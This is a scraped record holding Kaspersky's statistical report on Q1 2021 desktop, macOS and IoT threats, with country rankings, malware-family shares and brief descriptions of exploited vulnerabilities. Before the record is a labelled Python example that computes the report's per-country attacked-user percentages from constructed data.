_Geography of local infection attempts, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111505/15-en-malware-report-q1-2021-pc.png>))_
Overall, 15.05% of user computers globally faced at least one **Malware-class** local threat during Q1.
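The per-country ratings in this report (financial malware, web-based attacks and local threats) all use the same metric: unique users on whose computers a given protection component was triggered, as a percentage of all unique product users in that country, with small countries excluded and only Malware-class verdicts counted. The following added example (not Kaspersky's code or data) implements that computation end to end; the detection records, user totals and country codes are constructed, the 10,000-user threshold and the Malware-class filter follow the report's footnotes, and the worldwide figure is assumed to be computed over every country regardless of the threshold.

```python
"""Per-country 'share of attacked users' rating of the kind described in the
report's methodology notes. Added example, not Kaspersky's code or data:
totals and detection records are constructed. The 10,000-user exclusion and
the Malware-class filter follow the report's footnotes; computing the global
share over all countries (threshold or not) is an assumption."""
from collections import defaultdict

# Constructed totals of unique product users per (made-up) country code.
USERS_PER_COUNTRY = {"AA": 20000, "BB": 15000, "CC": 5000}

# Constructed detection records: (user_id, country, verdict_class).
# Every AA Malware user appears twice to show that users are deduplicated;
# AA also has RiskTool-only users, which a Malware-class rating ignores;
# CC has a high share but too few users to be rated.
DETECTIONS = (
    [(f"AA-{i}", "AA", "Malware") for i in range(1600)] * 2
    + [(f"AA-r{i}", "AA", "RiskTool") for i in range(300)]
    + [(f"BB-{i}", "BB", "Malware") for i in range(2100)]
    + [(f"CC-{i}", "CC", "Malware") for i in range(2000)]
)


def attacked_users_by_country(detections, verdict_class="Malware"):
    """Unique attacked users per country, restricted to one verdict class."""
    attacked = defaultdict(set)
    for user_id, country, vclass in detections:
        if vclass == verdict_class:
            attacked[country].add(user_id)
    return attacked


def attacked_share_ranking(detections, users_per_country,
                           min_users=10000, verdict_class="Malware"):
    """Rank countries by attacked unique users / all unique users (percent),
    skipping countries with fewer than `min_users` product users."""
    attacked = attacked_users_by_country(detections, verdict_class)
    ranking = []
    for country, total in users_per_country.items():
        if total < min_users:
            continue                      # footnote rule: too few users to rate
        share = round(100 * len(attacked[country]) / total, 2)
        ranking.append((country, share))
    ranking.sort(key=lambda item: (-item[1], item[0]))
    return ranking


def global_share(detections, users_per_country, verdict_class="Malware"):
    """Worldwide share of attacked users, over all countries (assumption)."""
    attacked = attacked_users_by_country(detections, verdict_class)
    total_attacked = sum(len(users) for users in attacked.values())
    return round(100 * total_attacked / sum(users_per_country.values()), 2)


if __name__ == "__main__":
    for rank, (country, share) in enumerate(attacked_share_ranking(DETECTIONS, USERS_PER_COUNTRY), 1):
        print(f"{rank} | {country} | {share:.2f}")
    print("worldwide:", global_share(DETECTIONS, USERS_PER_COUNTRY))
```

On the constructed data the rating is BB (14.00%) ahead of AA (8.00%); CC, at 40% attacked, is absent because it falls under the 10,000-user threshold, and the RiskTool-only users in AA do not move its figure. The worldwide share over all three countries comes out at 14.25%, which illustrates why the global average can sit well away from the top of the rating.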
{"id": "SECURELIST:20C7BC6E3C43CD3D939A2E3EAE01D4C1", "type": "securelist", "bulletinFamily": "blog", "title": "IT threat evolution Q1 2021. Non-mobile statistics", "description": "\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q1 2021:\n\n * Kaspersky solutions blocked 2,023,556,082 attacks launched from online resources across the globe.\n * 613,968,631 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempts to run malware designed to steal money via online access to bank accounts were stopped on the computers of 118,099 users.\n * Ransomware attacks were defeated on the computers of 91,841 unique users.\n * Our File Anti-Virus detected 77,415,192 unique malicious and potentially unwanted objects.\n\n## Financial threats\n\n### Financial threat statistics\n\nAt the end of last year, the number of users attacked by malware designed to steal money from bank accounts gradually decreased, a trend that continued in Q1 2021. 
This quarter, in total, Kaspersky solutions blocked the malware of such type on the computers of 118,099 unique users.\n\n_Number of unique users attacked by financial malware, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110545/01-en-malware-report-q1-2021-pc.png>))_\n\n**Attack geography**\n\n_To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all users of our products in that country._\n\n_Geography of financial malware attacks, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110629/02-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Turkmenistan | 6.3 \n2 | Tajikistan | 5.3 \n3 | Afghanistan | 4.8 \n4 | Uzbekistan | 4.6 \n5 | Paraguay | 3.2 \n6 | Yemen | 2.1 \n7 | Costa Rica | 2.0 \n8 | Sudan | 2.0 \n9 | Syria | 1.5 \n10 | Venezuela | 1.4 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000). \n** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\nAs before, the most widespread family of bankers in Q1 was ZeuS/Zbot (30.8%). Second place was taken by the CliptoShuffler family (15.9%), and third by Trickster (7.5%). All in all, more than half of all attacked users encountered these families. 
The notorious banking Trojan Emotet (7.4%) was deprived of its infrastructure this quarter as a result of a [joint operation](<https://www.europol.europa.eu/newsroom/news/world's-most-dangerous-malware-emotet-disrupted-through-global-action>) by Europol, the FBI and other law enforcement agencies, and its share predictably collapsed.\n\n**Top 10 banking malware families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | Zbot | Trojan.Win32.Zbot | 30.8 \n2 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 15.9 \n3 | Trickster | Trojan.Win32.Trickster | 7.5 \n4 | Emotet | Backdoor.Win32.Emotet | 7.4 \n5 | RTM | Trojan-Banker.Win32.RTM | 6.6 \n6 | Nimnul | Virus.Win32.Nimnul | 5.1 \n7 | Nymaim | Trojan.Win32.Nymaim | 4.7 \n8 | SpyEye | Trojan-Spy.Win32.SpyEye | 3.8 \n9 | Danabot | Trojan-Banker.Win32.Danabot | 2.9 \n10 | Neurevt | Trojan.Win32.Neurevt | 2.2 \n \n_** Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\n## Ransomware programs\n\n### Quarterly trends and highlights\n\n**New additions to the ransomware arsenal**\n\nLast year, the SunCrypt and RagnarLocker ransomware groups adopted new scare tactics. If the victim organization is slow to pay up, even though its files are encrypted and some of its confidential data has been stolen, the attackers additionally threaten to carry out a DDoS attack. In Q1 2021, these two groups were joined by a third, Avaddon. Besides publishing stolen data, the ransomware operators said on their website that the victim would be subjected to a DDoS attack until it reached out to them.\n\nREvil (aka Sodinokibi) is another group looking to increase its extortion leverage. 
In addition to DDoS attacks, it has [added](<https://twitter.com/3xp0rtblog/status/1368149692383719426>) spam and calls to clients and partners of the victim company to its toolbox.

**Attacks on vulnerable Exchange servers**

[Serious vulnerabilities were recently discovered](<https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/>) in the Microsoft Exchange mail server, allowing [remote code execution](<https://encyclopedia.kaspersky.com/glossary/remote-code-execution-rce/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>). Ransomware distributors wasted no time in exploiting these vulnerabilities; to date, this infection vector has been seen in use by the Black Kingdom and DearCry families.

**Publication of keys**

The developers of the Fonix (aka XINOF) ransomware ceased distributing their Trojan and posted the master key online for decrypting affected files. We took this key and created a [decryptor](<https://www.kaspersky.com/blog/fonix-decryptor/38646/>) that anyone can use. The developers of another strain of ransomware, Ziggy, not only [published](<https://www.bleepingcomputer.com/news/security/ziggy-ransomware-shuts-down-and-releases-victims-decryption-keys/>) the keys for all victims, but also announced their [intention](<https://www.bleepingcomputer.com/news/security/ransomware-admin-is-refunding-victims-their-ransom-payments/>) to return the money to everyone who paid up.

**Law enforcement successes**

Law enforcement agencies under the US Department of Justice [seized](<https://www.justice.gov/opa/pr/department-justice-launches-global-action-against-netwalker-ransomware>) dark web resources used by NetWalker (aka Mailto) ransomware affiliates, and also brought charges against one of the alleged actors.

French and Ukrainian law enforcers worked together to trace payments made through the Bitcoin ecosystem to Egregor ransomware distributors.
The joint investigation resulted in the [arrest](<https://www.bleepingcomputer.com/news/security/egregor-ransomware-affiliates-arrested-by-ukrainian-french-police/>) of several alleged members of the Egregor gang.

In South Korea, a suspect in the GandCrab ransomware operation was [arrested](<https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-affiliate-arrested-for-phishing-attacks/>) (this family ceased active distribution back in 2019).

### Number of new modifications

In Q1 2021, we detected seven new ransomware families and 4,354 new modifications of this malware type.

_Number of new ransomware modifications, Q1 2020 – Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110702/03-en-ru-es-malware-report-q1-2021-pc.png>))_

### Number of users attacked by ransomware Trojans

In Q1 2021, Kaspersky products and technologies protected 91,841 users from ransomware attacks.

_Number of unique users attacked by ransomware Trojans, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110733/04-en-malware-report-q1-2021-pc.png>))_

### Attack geography

_Geography of attacks by ransomware Trojans, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110802/05-en-malware-report-q1-2021-pc.png>))_

**Top 10 countries attacked by ransomware Trojans**

| | **Country**\* | **%**\*\* |
|---|---|---|
| 1 | Bangladesh | 2.31% |
| 2 | Ethiopia | 0.62% |
| 3 | Greece | 0.49% |
| 4 | Pakistan | 0.49% |
| 5 | China | 0.48% |
| 6 | Tunisia | 0.44% |
| 7 | Afghanistan | 0.42% |
| 8 | Indonesia | 0.38% |
| 9 | Taiwan, Province of China | 0.37% |
| 10 | Egypt | 0.28% |

_* Excluded are countries with relatively few Kaspersky users (under 50,000)._
_** Unique users attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country._

### Top 10 most common families of ransomware Trojans

| | **Name** | **Verdicts** | **%**\* |
|---|---|---|---|
| 1 | WannaCry | Trojan-Ransom.Win32.Wanna | 19.37% |
| 2 | (generic verdict) | Trojan-Ransom.Win32.Gen | 12.01% |
| 3 | (generic verdict) | Trojan-Ransom.Win32.Phny | 9.31% |
| 4 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 8.45% |
| 5 | (generic verdict) | Trojan-Ransom.Win32.Agent | 7.36% |
| 6 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom<br>Virus.Win32.PolyRansom | 3.78% |
| 7 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 2.93% |
| 8 | Stop | Trojan-Ransom.Win32.Stop | 2.79% |
| 9 | (generic verdict) | Trojan-Ransom.Win32.Cryptor | 2.17% |
| 10 | REvil/Sodinokibi | Trojan-Ransom.Win32.Sodin | 1.85% |

_* Unique Kaspersky users attacked by this family of ransomware Trojans as a percentage of all users attacked by such malware._

## Miners

### Number of new modifications

In Q1 2021, Kaspersky solutions detected 23,894 new modifications of miners. And though January and February passed off relatively calmly, March saw a sharp rise in the number of new modifications — more than fourfold compared to February.

_Number of new miner modifications, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110831/06-en-malware-report-q1-2021-pc.png>))_

### Number of users attacked by miners

In Q1, we detected attacks using miners on the computers of 432,171 unique users of Kaspersky products worldwide. Although this figure has been rising for three months, it is premature to talk about a reversal of last year's trend, whereby the number of users attacked by miners actually fell.
For now, we can tentatively assume that the growth in cryptocurrency prices, in particular bitcoin, has attracted the attention of cybercriminals and returned miners to their toolkit.

_Number of unique users attacked by miners, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111053/07-en-malware-report-q1-2021-pc.png>))_

### Attack geography

_Geography of miner attacks, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111128/08-en-malware-report-q1-2021-pc.png>))_

**Top 10 countries attacked by miners**

| | **Country**\* | **%**\*\* |
|---|---|---|
| 1 | Afghanistan | 4.65 |
| 2 | Ethiopia | 3.00 |
| 3 | Rwanda | 2.37 |
| 4 | Uzbekistan | 2.23 |
| 5 | Kazakhstan | 1.81 |
| 6 | Sri Lanka | 1.78 |
| 7 | Ukraine | 1.59 |
| 8 | Vietnam | 1.48 |
| 9 | Mozambique | 1.46 |
| 10 | Tanzania | 1.45 |

_* Excluded are countries with relatively few users of Kaspersky products (under 50,000)._
_** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._

## Vulnerable applications used by cybercriminals during cyber attacks

In Q1 2021, we noted a drop in the share of exploits for vulnerabilities in the Microsoft Office suite, but they still lead the pack with 59%. The most common vulnerability in the suite remains [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), a stack buffer overflow that occurs when processing objects in the Equation Editor component. Exploits for [CVE-2015-2523](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2523>) — a use-after-free vulnerability in Microsoft Excel — and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>), which we've often written about, were also in demand. Note the age of these vulnerabilities — even the latest of them was discovered almost three years ago.
So, once again, we remind you of the importance of regular updates.

The first quarter was rich not only in known exploits, but also in new zero-day vulnerabilities. In particular, the interest of both [infosec experts](<https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/>) and cybercriminals was piqued by vulnerabilities in the popular Microsoft Exchange Server:

* [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26855>) — a server-side request forgery vulnerability that allows remote code execution (RCE)
* [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26857>) — an insecure deserialization vulnerability in the Unified Messaging service that can lead to code execution on the server
* [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26858>) — a post-authentication arbitrary file write vulnerability in Microsoft Exchange, which could also lead to remote code execution
* [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-27065>) — as in the case of [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26858>), allows an authenticated Microsoft Exchange user to write data to an arbitrary file in the system

Found [in the wild](<https://encyclopedia.kaspersky.com/glossary/exploitation-in-the-wild-itw/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), these vulnerabilities were used by APT groups, including as a springboard for ransomware distribution.

During the quarter, vulnerabilities were also identified in Windows itself. In particular, the [CVE-2021-1732](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-1732>) vulnerability allowing privilege escalation was discovered in the Win32k subsystem.
Two other vulnerabilities, [CVE-2021-1647](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-1647>) and [CVE-2021-24092](<https://nvd.nist.gov/vuln/detail/CVE-2021-24092>), were found in the Microsoft Defender antivirus engine, allowing elevation of user privileges in the system and execution of potentially dangerous code.

_Distribution of exploits used by cybercriminals, by type of attacked application, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111159/09-en-malware-report-q1-2021-pc.png>))_

The second most popular were exploits for browser vulnerabilities (26.12%); their share in Q1 grew by more than 12 p.p. Here, too, newcomers appeared: for example, the Internet Explorer script engine was found to contain the [CVE-2021-26411](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26411>) vulnerability, which can lead to remote code execution on behalf of the current user through manipulations that corrupt heap memory. This vulnerability was exploited by the [Lazarus](<https://securelist.ru/tag/lazarus/>) group to download malicious code and infect the system. Several vulnerabilities were discovered in Google Chrome:

* [CVE-2021-21148](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21148>) — a heap buffer overflow in the V8 script engine, leading to remote code execution
* [CVE-2021-21166](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21166>) — an overflow and unsafe reuse of an object in memory when processing audio data, also enabling remote code execution
* [CVE-2021-21139](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21139>) — a bypass of security restrictions when using an iframe

Other interesting findings include a critical vulnerability in VMware vCenter Server, [CVE-2021-21972](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>), which allows remote code execution without any privileges.
Critical vulnerabilities in the popular SolarWinds Orion Platform — [CVE-2021-25274](<https://nvd.nist.gov/vuln/detail/CVE-2021-25274>), [CVE-2021-25275](<https://nvd.nist.gov/vuln/detail/CVE-2021-25275>) and [CVE-2021-25276](<https://nvd.nist.gov/vuln/detail/CVE-2021-25276>) — caused a major splash in the infosec community. They gave attackers the ability to infect computers running this software, usually machines inside corporate networks and government institutions. Lastly, the [CVE-2021-21017](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21017>) vulnerability, discovered in Adobe Reader, caused a heap buffer overflow by means of a specially crafted document, giving an attacker the ability to execute code.

Analysis of network threats in Q1 2021 continued to show ongoing attempts to attack servers with a view to brute-forcing passwords for network services such as Microsoft SQL Server, RDP and SMB. Attacks using the popular EternalBlue, EternalRomance and other similar exploits were widespread. Among the most notable new vulnerabilities in this period were bugs in the Windows networking stack code related to handling the IPv4/IPv6 protocols: [CVE-2021-24074](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-24074>), [CVE-2021-24086](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24086>) and [CVE-2021-24094](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24094>).

## Attacks on macOS

Q1 2021 was also rich in macOS-related news. Center stage were cybercriminals who took pains to modify their [malware for the newly released MacBooks with M1 processors](<https://securelist.com/malware-for-the-new-apple-silicon-platform/101137/>). Updated adware for the new Macs also immediately appeared, in particular the [Pirrit family](<https://objective-see.com/blog/blog_0x62.html>) (whose members placed high in our Top 20 threats for macOS).
In addition, we detected an interesting adware program written in the Rust language, and assigned it the verdict [AdWare.OSX.Convuster.a](<https://securelist.ru/convuster-macos-adware-in-rust/100859/>).

**Top 20 threats for macOS**

| | **Verdict** | **%**\* |
|---|---|---|
| 1 | AdWare.OSX.Pirrit.ac | 18.01 |
| 2 | AdWare.OSX.Pirrit.j | 12.69 |
| 3 | AdWare.OSX.Pirrit.o | 8.42 |
| 4 | AdWare.OSX.Bnodlero.at | 8.36 |
| 5 | Monitor.OSX.HistGrabber.b | 8.06 |
| 6 | AdWare.OSX.Pirrit.gen | 7.95 |
| 7 | Trojan-Downloader.OSX.Shlayer.a | 7.90 |
| 8 | AdWare.OSX.Cimpli.m | 6.17 |
| 9 | AdWare.OSX.Pirrit.aa | 6.05 |
| 10 | Backdoor.OSX.Agent.z | 5.27 |
| 11 | Trojan-Downloader.OSX.Agent.h | 5.09 |
| 12 | AdWare.OSX.Bnodlero.bg | 4.60 |
| 13 | AdWare.OSX.Ketin.h | 4.02 |
| 14 | AdWare.OSX.Bnodlero.bc | 3.87 |
| 15 | AdWare.OSX.Bnodlero.t | 3.84 |
| 16 | AdWare.OSX.Cimpli.l | 3.75 |
| 17 | Trojan-Downloader.OSX.Lador.a | 3.61 |
| 18 | AdWare.OSX.Cimpli.k | 3.48 |
| 19 | AdWare.OSX.Ketin.m | 2.98 |
| 20 | AdWare.OSX.Bnodlero.ay | 2.94 |

_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._

Traditionally, most of the Top 20 threats for macOS are adware programs: 15 in Q1. In the list of malicious programs, Trojan-Downloader.OSX.Shlayer.a (7.90%) maintained its popularity. Incidentally, this Trojan's task is to download adware from the Pirrit and Bnodlero families.
But we also saw the reverse, when a member of the AdWare.OSX.Pirrit family dropped Backdoor.OSX.Agent.z into the system.

### Threat geography

_Geography of threats for macOS, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111228/10-en-malware-report-q1-2021-pc.png>))_

**Top 10 countries by share of attacked users**

| | **Country**\* | **%**\*\* |
|---|---|---|
| 1 | France | 4.62 |
| 2 | Spain | 4.43 |
| 3 | Italy | 4.36 |
| 4 | India | 4.11 |
| 5 | Canada | 3.59 |
| 6 | Mexico | 3.55 |
| 7 | Russia | 3.21 |
| 8 | Brazil | 3.18 |
| 9 | Great Britain | 2.96 |
| 10 | USA | 2.94 |

_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000)._
_** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._

In Q1 2021, Europe accounted for the Top 3 countries by share of attacked macOS users: France (4.62%), Spain (4.43%) and Italy (4.36%). The most common threats in all three were adware apps from the Pirrit family.

## IoT attacks

### IoT threat statistics

In Q1 2021, most of the devices that attacked Kaspersky traps did so using the Telnet protocol.
A third of the attacking devices attempted to [brute-force](<https://encyclopedia.kaspersky.com/glossary/brute-force/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) our SSH traps.

| Service | Share |
|---|---|
| Telnet | 69.48% |
| SSH | 30.52% |

_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2021_

The statistics for cybercriminal working sessions with Kaspersky honeypots show similar Telnet dominance.

| Service | Share |
|---|---|
| Telnet | 77.81% |
| SSH | 22.19% |

_Distribution of cybercriminal working sessions with Kaspersky traps, Q1 2021_

_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Telnet traps, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111259/11-en-malware-report-q1-2021-pc.png>))_

**Top 10 countries by location of devices from which attacks were carried out on Kaspersky Telnet traps**

| | **Country** | **%**\* |
|---|---|---|
| 1 | China | 33.40 |
| 2 | India | 13.65 |
| 3 | USA | 11.56 |
| 4 | Russia | 4.96 |
| 5 | Montenegro | 4.20 |
| 6 | Brazil | 4.19 |
| 7 | Taiwan, Province of China | 2.32 |
| 8 | Iran | 1.85 |
| 9 | Egypt | 1.84 |
| 10 | Vietnam | 1.73 |

_* Devices from which attacks were carried out in the given country as a percentage of the total number of devices in that country._

### SSH-based attacks

_Geography of IP addresses of devices from which attempts were made to attack Kaspersky SSH traps, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111335/12-en-malware-report-q1-2021-pc.png>))_

**Top 10 countries by location of devices from which attacks were made on Kaspersky SSH traps**

| | **Country** | **%**\* |
|---|---|---|
| 1 | USA | 24.09 |
| 2 | China | 19.89 |
| 3 | Hong Kong | 6.38 |
| 4 | South Korea | 4.37 |
| 5 | Germany | 4.06 |
| 6 | Brazil | 3.74 |
| 7 | Russia | 3.05 |
| 8 | Taiwan, Province of China | 2.80 |
| 9 | France | 2.59 |
| 10 | India | 2.36 |

_* Devices from which attacks were carried out in the given country as a percentage of the total number of devices in that country._

### Threats loaded into traps

| | Verdict | %\* |
|---|---|---|
| 1 | Backdoor.Linux.Mirai.b | 50.50% |
| 2 | Trojan-Downloader.Linux.NyaDrop.b | 9.26% |
| 3 | Backdoor.Linux.Gafgyt.a | 3.01% |
| 4 | HEUR:Trojan-Downloader.Shell.Agent.bc | 2.72% |
| 5 | Backdoor.Linux.Mirai.a | 2.72% |
| 6 | Backdoor.Linux.Mirai.ba | 2.67% |
| 7 | Backdoor.Linux.Agent.bc | 2.37% |
| 8 | Trojan-Downloader.Shell.Agent.p | 1.37% |
| 9 | Backdoor.Linux.Gafgyt.bj | 0.78% |
| 10 | Trojan-Downloader.Linux.Mirai.d | 0.66% |

_* Share of malware type in the total number of malicious programs downloaded to IoT devices following a successful attack._

## Attacks via web resources

_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create such sites on purpose; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._

### Countries that are sources of web-based attacks: Top 10

_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._

_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._

In Q1 2021, Kaspersky solutions blocked 2,023,556,082 attacks launched from online resources located across the globe.
613,968,631 unique URLs were recognized as malicious by Web Anti-Virus.

_Distribution of web attack sources by country, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111405/13-en-malware-report-q1-2021-pc.png>))_

### Countries where users faced the greatest risk of online infection

To assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.

This rating only includes attacks by malicious objects that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.

| | Country\* | % of attacked users\*\* |
|---|---|---|
| 1 | Belarus | 15.81 |
| 2 | Ukraine | 13.60 |
| 3 | Moldova | 13.16 |
| 4 | Kyrgyzstan | 11.78 |
| 5 | Latvia | 11.38 |
| 6 | Algeria | 11.16 |
| 7 | Russia | 11.11 |
| 8 | Mauritania | 11.08 |
| 9 | Kazakhstan | 10.62 |
| 10 | Tajikistan | 10.60 |
| 11 | Uzbekistan | 10.39 |
| 12 | Estonia | 10.20 |
| 13 | Armenia | 9.44 |
| 14 | Mongolia | 9.36 |
| 15 | France | 9.35 |
| 16 | Greece | 9.04 |
| 17 | Azerbaijan | 8.57 |
| 18 | Madagascar | 8.56 |
| 19 | Morocco | 8.55 |
| 20 | Lithuania | 8.53 |

_* Excluded are countries with relatively few Kaspersky users (under 10,000)._
_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._

_These statistics are based on detection verdicts by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._

On average, 7.67% of Internet user computers worldwide experienced at least one **Malware-class** attack.

_Geography of web-based malware attacks, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111435/14-en-malware-report-q1-2021-pc.png>))_

## Local threats

_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._

In Q1 2021, our File Anti-Virus detected **77,415,192** malicious and potentially unwanted objects.

### Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period.
These statistics reflect the level of personal computer infection in different countries.

Note that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

| | Country\* | % of attacked users\*\* |
|---|---|---|
| 1 | Afghanistan | 47.71 |
| 2 | Turkmenistan | 43.39 |
| 3 | Ethiopia | 41.03 |
| 4 | Tajikistan | 38.96 |
| 5 | Bangladesh | 36.21 |
| 6 | Algeria | 35.49 |
| 7 | Myanmar | 35.16 |
| 8 | Uzbekistan | 34.95 |
| 9 | South Sudan | 34.17 |
| 10 | Benin | 34.08 |
| 11 | China | 33.34 |
| 12 | Iraq | 33.14 |
| 13 | Laos | 32.84 |
| 14 | Burkina Faso | 32.61 |
| 15 | Mali | 32.42 |
| 16 | Guinea | 32.40 |
| 17 | Yemen | 32.32 |
| 18 | Mauritania | 32.22 |
| 19 | Burundi | 31.68 |
| 20 | Sudan | 31.61 |

_* Excluded are countries with relatively few Kaspersky users (under 10,000)._
_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._

_Geography of local infection attempts, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111505/15-en-malware-report-q1-2021-pc.png>))_

Overall, 15.05% of user computers globally faced at least one **Malware-class** local threat during Q1.

_Published 2021-05-31 by AMR at [securelist.com](<https://securelist.com/it-threat-evolution-q1-2021-non-mobile-statistics/102425/>)._
"FEDORA_2021-B7CC24375B.NASL", "FEDORA_2021-C88A96BD4B.NASL", "FREEBSD_PKG_3E01AAD2680E11EB83E2E09467587C17.NASL", "FREEBSD_PKG_4ED0E43C5CEF11EBBAFD3065EC8FD3EC.NASL", "FREEBSD_PKG_F00B65D87CCB11EBB3BEE09467587C17.NASL", "GENTOO_GLSA-202101-13.NASL", "GENTOO_GLSA-202104-08.NASL", "GOOGLE_CHROME_88_0_4324_150.NASL", "GOOGLE_CHROME_88_0_4324_96.NASL", "GOOGLE_CHROME_89_0_4389_72.NASL", "HAFNIUM_IOC_DETECT.NBIN", "MACOSX_GOOGLE_CHROME_88_0_4324_150.NASL", "MACOSX_GOOGLE_CHROME_88_0_4324_96.NASL", "MACOSX_GOOGLE_CHROME_89_0_4389_72.NASL", "MACOSX_MS15-099_OFFICE_2011.NASL", "MACOS_ADOBE_ACROBAT_APSB21-09.NASL", "MACOS_ADOBE_READER_APSB21-09.NASL", "MICROSOFT_EDGE_CHROMIUM_88_0_705_50.NASL", "MICROSOFT_EDGE_CHROMIUM_88_0_705_63.NASL", "MICROSOFT_EDGE_CHROMIUM_89_0_774_45.NASL", "OPENSUSE-2021-166.NASL", "OPENSUSE-2021-173.NASL", "OPENSUSE-2021-267.NASL", "OPENSUSE-2021-296.NASL", "OPENSUSE-2021-392.NASL", "OPENSUSE-2021-413.NASL", "SERVU_15_2_2_1.NASL", "SMB_NT_MS15-099.NASL", "SMB_NT_MS17_NOV_OFFICE.NASL", "SMB_NT_MS18_JAN_OFFICE.NASL", "SMB_NT_MS18_JAN_OFFICE_COMPATIBILITY.NASL", "SMB_NT_MS21_FEB_4601315.NASL", "SMB_NT_MS21_FEB_4601318.NASL", 